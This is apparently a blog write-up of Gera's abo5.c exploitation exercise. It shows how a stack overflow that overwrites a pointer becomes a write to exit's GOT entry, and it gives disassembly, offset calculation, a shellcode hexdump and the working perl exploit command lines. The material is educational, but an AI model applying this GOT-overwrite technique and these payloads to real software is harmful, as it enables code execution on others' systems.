Introduction
I actually solved this one a bit ago, while messing around at the GFIRST 2010 conference in San Antonio. Just now getting around to writing it up.
Here is the code for abo5.c:
Gera says: ch-ch-ch-changes
/* abo5.c *
* specially crafted to feed your brain by gera@core-sdi.com */
/* You take the blue pill, you wake up in your bed, *
* and you believe what you want to believe *
* You take the red pill, *
* and I'll show you how deep goes the rabbit hole */
int main(int argv,char **argc) {
	char *pbuf=malloc(strlen(argc[2])+1);
	char buf[256];

	strcpy(buf,argc[1]);
	for (;*pbuf++=*(argc[2]++););
	exit(1);
}
Use your sixth sense, will you be able to gain control given the possibility of writing wherever you wish in memory?
As you can see, this code is very similar to the abo4.c exercise. Gera’s words are the key to this exercise; as is often the case, he’s given us a clue. We know very well from our previous trials and tribulations with abo4.c that by overflowing buf into the pbuf pointer on the stack, we can write data of our choosing to an arbitrary writeable location in the memory of the running process. Controlling 4 bytes there is all we need, and it ends up being the key to successful exploitation of this code snippet.
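To make the pointer-overwrite idea concrete, here is a minimal, memory-safe sketch of it in C. Everything in it is a stand-in I made up for illustration (struct fake_frame, simulate_abo5, the scratch buffer); it models the stack frame as a struct rather than smashing a real stack, and it uses memcpy in place of the overflowing strcpy, so treat it as a model of the mechanism and not as an exploit.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical model of main's locals: buf sits below pbuf, as on the stack. */
struct fake_frame {
    char  buf[256];
    char *pbuf;
};

/* Models abo5: the first copy runs past buf and replaces pbuf with the
 * address of `victim`; the second copy then writes second_arg there.
 * The caller must make sure victim can hold second_arg plus its NUL. */
void simulate_abo5(char *victim, const char *second_arg) {
    struct fake_frame f;
    char scratch[8] = {0};                 /* stands in for the malloc'd block */
    unsigned char input[sizeof(struct fake_frame)];
    size_t off = offsetof(struct fake_frame, pbuf);

    f.pbuf = scratch;                      /* what pbuf holds before the overflow */

    /* "argv[1]": filler up to pbuf, followed by the bytes of the new pointer. */
    memset(input, 'A', off);
    memcpy(input + off, &victim, sizeof victim);

    /* Stand-in for strcpy(buf, argv[1]) running off the end of buf. */
    memcpy(&f, input, off + sizeof victim);

    /* Same shape as the loop in abo5.c: copy until the NUL has been written. */
    while ((*f.pbuf++ = *second_arg++) != '\0') {
        /* nothing to do: the copy happens in the condition */
    }
}
```

Calling simulate_abo5(victim, "pwn") on a small char array leaves "pwn" in that array, even though the function never names it as a copy destination. In the real exercise the "victim" is whatever writeable address we place at the end of the first argument.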
Disassembly
Let’s take a look at the disassembled code. The important bits are the call to strcpy at main+68 and the call to exit at main+109.
(gdb) disassemble main
Dump of assembler code for function main:
0x08048414 <main+0>:    push   ebp
0x08048415 <main+1>:    mov    ebp,esp
0x08048417 <main+3>:    sub    esp,0x128
0x0804841d <main+9>:    and    esp,0xfffffff0
0x08048420 <main+12>:   mov    eax,0x0
0x08048425 <main+17>:   sub    esp,eax
0x08048427 <main+19>:   mov    eax,DWORD PTR [ebp+12]
0x0804842a <main+22>:   add    eax,0x8
0x0804842d <main+25>:   mov    eax,DWORD PTR [eax]
0x0804842f <main+27>:   mov    DWORD PTR [esp],eax
0x08048432 <main+30>:   call   0x804830c <strlen@plt>
0x08048437 <main+35>:   inc    eax
0x08048438 <main+36>:   mov    DWORD PTR [esp],eax
0x0804843b <main+39>:   call   0x804832c <malloc@plt>
0x08048440 <main+44>:   mov    DWORD PTR [ebp-12],eax
0x08048443 <main+47>:   mov    eax,DWORD PTR [ebp+12]
0x08048446 <main+50>:   add    eax,0x4
0x08048449 <main+53>:   mov    eax,DWORD PTR [eax]
0x0804844b <main+55>:   mov    DWORD PTR [esp+4],eax
0x0804844f <main+59>:   lea    eax,[ebp-0x118]
0x08048455 <main+65>:   mov    DWORD PTR [esp],eax
0x08048458 <main+68>:   call   0x804831c <strcpy@plt>
0x0804845d <main+73>:   mov    eax,DWORD PTR [ebp-12]
0x08048460 <main+76>:   mov    ecx,eax
0x08048462 <main+78>:   mov    eax,DWORD PTR [ebp+12]
0x08048465 <main+81>:   add    eax,0x8
0x08048468 <main+84>:   mov    edx,DWORD PTR [eax]
0x0804846a <main+86>:   movzx  edx,BYTE PTR [edx]
0x0804846d <main+89>:   inc    DWORD PTR [eax]
0x0804846f <main+91>:   mov    BYTE PTR [ecx],dl
0x08048471 <main+93>:   lea    eax,[ebp-12]
0x08048474 <main+96>:   inc    DWORD PTR [eax]
0x08048476 <main+98>:   test   dl,dl
0x08048478 <main+100>:  jne    0x804845d <main+73>
0x0804847a <main+102>:  mov    DWORD PTR [esp],0x1
0x08048481 <main+109>:  call   0x804833c <exit@plt>
End of assembler dump.
The first important line, at main+68, is the call to strcpy that will overwrite the pointer value with the value presented as argv[1], the first command line argument (argc[1] in Gera’s swapped naming). The bit between that call and the call to exit (main+73 through main+100) is the implementation of the for loop that writes the contents of argv[2] to wherever pbuf points, and the second important line, at main+109, is the call to exit. As you can see in the disassembly and when reviewing the source, this code is slightly different from the previous pointer-overwrite exercise, in that there is no call through a function pointer afterward. So we can’t control execution in that manner. We could do a saved return address overwrite, since we essentially have control over a single DWORD in writeable memory (the stack being a writeable memory location of course), but unfortunately there is a pesky call to exit, which means main never returns and that method won’t work.
Actually, if you’ve taken a look, you’ve realized that pretty much the only thing that happens after we write through the overwritten pointer is a call to exit. Hmm…how can we use this to our advantage? Well first, you’ll note that the call to the exit routine is not as clear cut as it seems. It’s really a call to exit@plt, a small stub that jumps through a pointer in memory…perhaps we can control where that pointer leads?
Dynamic Linking
The reason that this call is exploitable is that the program is dynamically linked. The gist of dynamic linking is that a program can be compiled with references to external functions (functions declared in a header such as stdio.h and implemented in a separately compiled library, printf for instance) which are resolved at load time or run time. For that reason you may sometimes hear it referred to as run time linking. The details of linking and loading are beyond the scope of this article, and indeed my knowledge. This is what .dll files on Windows are for, and .so files on Linux and UNIX. Essentially, they contain functions that might be useful to have on the system, or functions that the C or C++ standards specify must be available, and they allow those functions to be shared among multiple programs without compiling them directly into each one. This provides a few advantages. Off the top of my head, the most obvious ones are that you can fix a bug in a commonly used function once and have the fix propagate to all the code that uses it, and that you reduce the compiled size and complexity of a given code base. All of these operating systems use some sort of lookup table that allows programs to resolve run time linked functions. On Linux and UNIX this lookup table is called the GOT, or Global Offset Table, and it works in close conjunction with another structure called the Procedure Linkage Table, or PLT.
Taking a Look Under the Hood
There is a lot of documentation to be found describing the structure and implementation of the GOT and PLT on Linux machines, and I’ve included some that I’ve found useful at the end of this post. In this case, I think I’d rather just take a look at the assembly and let that point us in the right direction. Honestly, so long as you understand that you can write an arbitrary 4-byte value anywhere you want to (that is writeable and won’t produce a segfault) you can reason out what to do here without knowing much or at all about the GOT or PLT.
Let’s step through the call to exit and see what we find.
0x08048481 <main+109>:  call   0x804833c <exit@plt>
End of assembler dump.
(gdb) x/i 0x804833c
0x804833c <exit@plt>:   jmp    DWORD PTR ds:0x8049668
(gdb) x/xw 0x8049668
0x8049668 <_GLOBAL_OFFSET_TABLE_+32>:   0x08048342
First we’ve got the call to 0x804833c, which is the location of exit in the aforementioned PLT. Examining the instruction at that address shows an unconditional jump to the address contained in a pointer. This pointer, as you can see from the results of the final command we ran, lives in the GOT at 0x8049668 and currently contains the value 0x08048342 (which points back into the PLT, just past the jmp, because exit has not been resolved yet). If we overwrite that value with the address of some shellcode, the call to exit will jump to our shellcode instead and we’ll have control of execution. Here is how that plays out against abo5.
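Before the real run, the redirect itself can be modeled in a few lines of ordinary C. This is only a toy: fake_got, call_exit_via_plt, real_exit_handler and payload_handler are names I invented for the sketch, and a one-slot array of function pointers stands in for the real GOT. The point it illustrates is that a call routed through a writeable pointer goes wherever that pointer says at the moment of the call.

```c
#include <string.h>

/* Hypothetical stand-ins; none of these names exist in abo5 or libc. */
typedef int (*handler_fn)(void);

int real_exit_handler(void) { return 1; }   /* plays the role of exit */
int payload_handler(void)   { return 42; }  /* plays the role of the shellcode */

/* A one-slot "GOT": the slot holds the address the stub will jump to. */
handler_fn fake_got[1] = { real_exit_handler };

/* The "PLT stub": it does nothing except jump through the slot. */
int call_exit_via_plt(void) {
    return fake_got[0]();
}

/* The arbitrary write: replace the slot's contents with our own address,
 * then make the same call the program was always going to make. */
int demo_got_overwrite(void) {
    handler_fn target = payload_handler;
    memcpy(&fake_got[0], &target, sizeof target);
    return call_exit_via_plt();
}
```

Before the overwrite, call_exit_via_plt() reaches real_exit_handler; after demo_got_overwrite() has run, the very same call reaches payload_handler. Nothing about the call site changed, only the data it reads its destination from.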
First we’ll determine the distance between the address of buf and pbuf on the stack.
(gdb) break 1
Breakpoint 2 at 0x8048414: file abo5.c, line 1.
(gdb) run one two
Starting program: /home/hacking/InsecureProgramming/abo5 one two
Breakpoint 2, main (argv=134513684, argc=0x3) at abo5.c:9
9 int main(int argv,char **argc) {
(gdb) x/x &buf
0xbffff730: 0x0804819c
(gdb) x/x &pbuf
0xbffff83c: 0xb8000ff4
(gdb) print/d 0xbffff83c - 0xbffff730
$4 = 268
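As a sanity check, the same distance falls out of the frame offsets in the disassembly: buf is loaded from ebp-0x118 (main+59) and pbuf lives at ebp-12 (main+44). A small sketch of that arithmetic, with a helper name of my own choosing:

```c
#include <stddef.h>

/* Distance in bytes from a lower stack slot up to a higher one, given how
 * far below ebp each slot sits (values read off the disassembly). */
size_t distance_between_slots(size_t lower_slot_below_ebp,
                              size_t higher_slot_below_ebp) {
    return lower_slot_below_ebp - higher_slot_below_ebp;
}
```

distance_between_slots(0x118, 12) gives 268, which agrees with the subtraction of the two addresses gdb printed.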
Then we’ll do our at-this-point-very-common magic with the shellcode we’ve been using all along, the address on the GOT for exit, the getenvaddr.c code that was generously provided by Hacking: The Art of Exploitation, and all the rest.
hacking@hacking-theart:~/InsecureProgramming $ hexdump -C print_youwin_shellcode
00000000  eb 13 59 31 c0 b0 04 31  db 43 31 d2 b2 0a cd 80  |..Y1...1.C1.....|
00000010  b0 01 4b cd 80 e8 e8 ff  ff ff 79 6f 75 20 77 69  |..K.......you wi|
00000020  6e 21 0a 0d                                       |n!..|
00000024
hacking@hacking-theart:~/InsecureProgramming $ export SHELLCODE=$(cat print_youwin_shellcode)
hacking@hacking-theart:~/InsecureProgramming $ echo $SHELLCODE
?Y1??1?C1? ??K??????you win!
hacking@hacking-theart:~/InsecureProgramming $ ./getenvaddr SHELLCODE ./abo5
SHELLCODE will be at 0xbffff9ec
hacking@hacking-theart:~/InsecureProgramming $ ./abo5 $(perl -e 'print "A" x 268 . "\x68\x96\x04\x08";') $(perl -e 'print "\xec\xf9\xff\xbf";')
you win!
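For anyone who would rather not squint at the perl one-liners, here is a rough C equivalent of how the two arguments are put together. The helper names put_le32 and build_overflow_arg are mine, not part of the exercise, and the sketch assumes a 32-bit little-endian target like the one used above.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Store a 32-bit address least-significant byte first, the way x86 reads it. */
void put_le32(unsigned char out[4], uint32_t addr) {
    out[0] = (unsigned char)(addr & 0xff);
    out[1] = (unsigned char)((addr >> 8) & 0xff);
    out[2] = (unsigned char)((addr >> 16) & 0xff);
    out[3] = (unsigned char)((addr >> 24) & 0xff);
}

/* Build the first argument: pad_len filler bytes, then the address that
 * should land in pbuf, then a terminating NUL. The caller frees the result.
 * Returns NULL if the allocation fails. */
char *build_overflow_arg(size_t pad_len, uint32_t addr) {
    char *arg = malloc(pad_len + 4 + 1);
    if (arg == NULL) {
        return NULL;
    }
    memset(arg, 'A', pad_len);
    put_le32((unsigned char *)arg + pad_len, addr);
    arg[pad_len + 4] = '\0';
    return arg;
}
```

build_overflow_arg(268, 0x08049668) produces the same bytes as the first perl command (268 A’s followed by 68 96 04 08), and put_le32 applied to 0xbffff9ec produces the ec f9 ff bf of the second. One caveat worth keeping in mind: command line arguments are NUL-terminated strings, so this only works when none of the address bytes is 0x00, which happens to be true for both addresses here.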
There we go, that’s all for now.
References
I didn’t really use these references to develop this post, but in perusing them I thought they’d be useful for someone wanting a bit more in-depth explanation of some of the concepts in here.
Executable and Linking Format (ELF) by unknown author, Tool Interface Standards, Portable Formats Specification, Ver 1.1
Dynamic Linking in Linux and Windows by Reji Thomas and Bhasker Reddy, Symantec
Understanding Memory by University of Alberta AICT Research and Support